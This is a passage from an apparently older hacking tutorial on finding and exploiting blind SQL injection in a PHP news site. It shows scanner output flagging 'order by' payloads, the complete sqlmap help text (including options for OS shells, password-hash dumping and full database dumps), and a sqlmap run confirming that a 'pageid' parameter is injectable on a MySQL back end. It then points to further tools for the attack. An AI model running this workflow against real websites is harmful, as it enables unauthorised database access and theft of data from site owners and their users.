[-]Saving response length for blind sqli at: http://www.mywebsite.com/news3.php? pageid=118+order+by+300--
[+]W00t !! Found Possible Blind sqli Bug at:http://www.mywebsite.com/news3.php
?pageid=118+order+by+300--
[+]Possible server's hole saved at webscan.txt
[-]Saving response length for blind sqli at: http://www.mywebsite.com/news2.php? pageid=39+order+by+1--
[+]W00t !! Found Possible Blind sqli Bug at:http://www.mywebsite.com/news2.php
?pageid=39+order+by+300--
[+]Possible server's hole saved at webscan.txt
        Press Any key For Going Back...

Step 8: Open file webscan.txt. The results from webscan.txt file shows some possible Blind SQLi
[+]W00t!!Found Possible Blind sqli Bug at: http://www.mywebsite.com/viewnews.php?
pageid=82+order+by+300--
[+]W00t!!Found Possible Blind sqli Bug at: http://www.mywebsite.com/news3.php? pageid=118+order+by+300--

 

Testing Vulnerable Parameter:
To test a vulnerable parameter using automated tools, you can use some tools such as sqlmap, bsqlbf-v2, darkjumperv5.7 and other tools. To test vulnerable parameter for BlindSQL injection, I’m using sqlmap.py to test the targeted URL above. You must understand and know how to use sqlmap.py tool. If you do not understand how to use it, you can refer to the Help menu that built-in together with this tool (Use sqlmap.py –h  command to see Help menu)

E:\Izhar\Tool\SQL Injection\sqlmap-0.7>sqlmap.py -h
    sqlmap/0.7
    by Bernardo Damele A. G.
Usage: E:\Izhar\Tool\SQL Injection\sqlmap-0.7\sqlmap.py [options]
Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -v VERBOSE            Verbosity level: 0-5 (default 1)
Target:
    At least one of these options has to be specified to set the source to
    get target urls from.
    -u URL, --url=URL   Target url
    -l LIST             Parse targets from Burp or WebScarab logs
    -g GOOGLEDORK       Process Google dork results as target urls
    -c CONFIGFILE       Load options from a configuration INI file
Request:
These options can be used to specify how to connect to the target url.
    --method=METHOD     HTTP method, GET or POST (default GET)
    --data=DATA         Data string to be sent through POST
    --cookie=COOKIE     HTTP Cookie header
    --referer=REFERER   HTTP Referer header
    --user-agent=AGENT  HTTP User-Agent header
    -a USERAGENTSFILE   Load a random HTTP User-Agent header from file
    --headers=HEADERS   Extra HTTP headers newline separated
    --auth-type=ATYPE   HTTP Authentication type (value Basic or Digest)
    --auth-cred=ACRED   HTTP Authentication credentials (value name:password)
    --proxy=PROXY       Use a HTTP proxy to connect to the target url
    --threads=THREADS   Maximum number of concurrent HTTP requests (default 1)
    --delay=DELAY       Delay in seconds between each HTTP request
    --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
    --retries=RETRIES   Retries when the connection timeouts (default 3)
Injection:
These options can be used to specify which parameters to test for, provide custom injection payloads and how to parse and compare HTTP responses page content when using the blind SQL injection technique.
    -p TESTPARAMETER    Testable parameter(s)
    --dbms=DBMS         Force back-end DBMS to this value
    --os=OS             Force back-end DBMS operating system to this value
    --prefix=PREFIX     Injection payload prefix string
    --postfix=POSTFIX   Injection payload postfix string
    --string=STRING     String to match in page when the query is valid
    --regexp=REGEXP     Regexp to match in page when the query is valid
    --excl-str=ESTRING  String to be excluded before comparing page contents
    --excl-reg=EREGEXP  Matches to be excluded before comparing page contents
Techniques:
These options can be used to test for specific SQL injection technique or to use one of them to exploit the affected parameter(s) rather than using the default blind SQL injection technique.
    --stacked-test      Test for stacked queries (multiple statements) support
    --time-test         Test for time based blind SQL injection
    --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)
    --union-test        Test for UNION query (inband) SQL injection
    --union-tech=UTECH  Technique to test for UNION query SQL injection
    --union-use         Use the UNION query (inband) SQL injection to retrieve
       the queries output. No need to go blind
Fingerprint:
    -f, --fingerprint   Perform an extensive DBMS version fingerprint
Enumeration:
These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements.
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --is-dba            Detect if the DBMS current user is DBA
    --users             Enumerate DBMS users
    --passwords         Enumerate DBMS user’s password hashes (opt -U)
    --privileges        Enumerate DBMS users privileges (opt -U)
    --dbs               Enumerate DBMS databases
    --tables            Enumerate DBMS database tables (opt -D)
    --columns           Enumerate DBMS database table columns (req -T opt -D)
    --dump              Dump DBMS database table entries (req -T, opt -D, -C)
    --dump-all          Dump all DBMS databases tables entries
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table to enumerate
    -C COL              DBMS database table column to enumerate
    -U USER             DBMS user to enumerate
    --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
    --start=LIMITSTART  First query output entry to retrieve
    --stop=LIMITSTOP    Last query output entry to retrieve
    --sql-query=QUERY   SQL statement to be executed
    --sql-shell         Prompt for an interactive SQL shell
File system access:
    These options can be used to access the back-end database management
    system underlying file system.
    --read-file=RFILE   Read a file from the back-end DBMS file system
    --write-file=WFILE  Write a local file on the back-end DBMS file system
    --dest-file=DFILE   Back-end DBMS absolute filepath to write to
Operating system access:
    This option can be used to access the back-end database management
    system underlying operating system.
    --os-cmd=OSCMD      Execute an operating system command
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an out-of-band shell, meterpreter or VNC
    --os-smbrelay     One click prompt for an OOB shell, meterpreter or VNC
    --os-bof            Stored procedure buffer overflow exploitation
    --priv-esc          User priv escalation by abusing Windows access tokens
    --msf-path=MSFPATH  Local path where Metasploit Framework 3 is installed
    --tmp-path=TMPPATH  Remote absolute path of temporary files directory
Miscellaneous:
    --eta               Display for each output the estimated time of arrival
    --update            Update sqlmap to the latest stable version
    -s SESSIONFILE      Save and resume all data retrieved on a session file
    --save              Save options on a configuration INI file
    --batch             Never ask for user input, use the default behaviour
    --cleanup           Clean up the DBMS by sqlmap specific UDF and tab


There is an injection function in sqlmap.py tool. The injection function in sqlmap.py can be used to specify which parameters to test for, provide custom injection payloads and how to parse and compare HTTP responses page content when using the blind SQL injection technique. For testable parameter, by default sqlmap tests all GET parameters, POST parameters, HTTP Cookie header values and HTTP User-Agent header value for dynamicity and SQL injection vulnerability, but it is possible to manually specify the parameter(s) you want sqlmap to perform tests on comma separated in order to skip dynamicity tests and perform SQL injection test and inject directly only against the provided parameter(s).

The example below shows that I will try to test for one parameter called “pageid” to check whether it is vulnerable or not. If you want to test more than one parameter, you can separate it by comma like this “pageid, menuid, sid”

E:\Izhar\Tool\SQL Injection\sqlmap-0.7>sqlmap.py –u "http://www.mywebsite.com/
viewnews.php?pageid=82" -v 1 -p "pageid"
    sqlmap/0.7
    by Bernardo Damele A. G.
[*] starting at: 17:15:41
[17:15:41] [INFO] testing connection to the target url
[17:15:45] [INFO] testing if the url is stable, wait a few seconds
[17:15:48] [INFO] url is stable
[17:15:48] [INFO] testing sql injection on GET parameter 'pageid' with 0 parenthesis
[17:15:48] [INFO] testing unescaped numeric injection on GET parameter 'pageid'
[17:15:50] [INFO] confirming unescaped numeric injection on GET parameter 'pageid'
[17:15:52] [INFO] GET parameter 'pageid' is unescaped numeric injectable with 0 parenthesis
[17:15:52] [INFO] testing for parenthesis on injectable parameter
[17:15:54] [INFO] the injectable parameter requires 0 parenthesis
[17:15:54] [INFO] testing MySQL
[17:15:55] [INFO] confirming MySQL
[17:15:59] [INFO] retrieved: 6
[17:16:08] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Apache 1.3.41
back-end DBMS: MySQL >= 5.0.0
[*] shutting down at: 17:16:08
E:\Izhar\Tool\SQL Injection\sqlmap-0.7

The result above shows that parameter pageid is vulnerable for injection. You can use the other functions in sqlmap.py to perform Blind SQL injection attack. And also can use darkMYSQLi.py or DarkjumperV5.7. If you want to use darkMYSQLi.py, you can follow my previous tutorial here: http://www.exploit-db.com/download_pdf/11716
But I’m using the other tool called SimpleSQLDumper v5.1 to perform injection attack. 

I will release another article with full details later.